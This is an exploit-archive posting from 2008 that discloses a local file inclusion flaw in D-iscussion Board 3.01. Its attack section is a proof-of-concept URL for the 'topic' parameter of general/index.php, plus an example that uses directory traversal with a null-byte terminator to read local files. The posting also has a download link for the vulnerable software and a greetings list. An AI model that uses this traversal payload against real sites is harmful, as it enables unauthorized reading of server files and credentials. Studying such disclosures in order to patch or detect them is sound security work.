[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : D-iscussion Board 3.01 (topic) Local File Inclusion Vulnerability
# Published : 2008-09-11
# Author : SirGod
# Previous Title : Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
# Next Title : phsBlog 0.2 Bypass SQL Injection Filtering Exploit
############################################################################################################
[+] D-iscussion Board 3.01 Local File Inclusion
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke
############################################################################################################
Download : http://dino.shiftedphase.com/comp/downloads/forum.zip
[+] Local File Inclusion
PoC :
http://[target]/[path]/general/index.php?topic=[LocalFile]%00
Example :
http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00
############################################################################################################
# www.Syue.com [2008-09-11]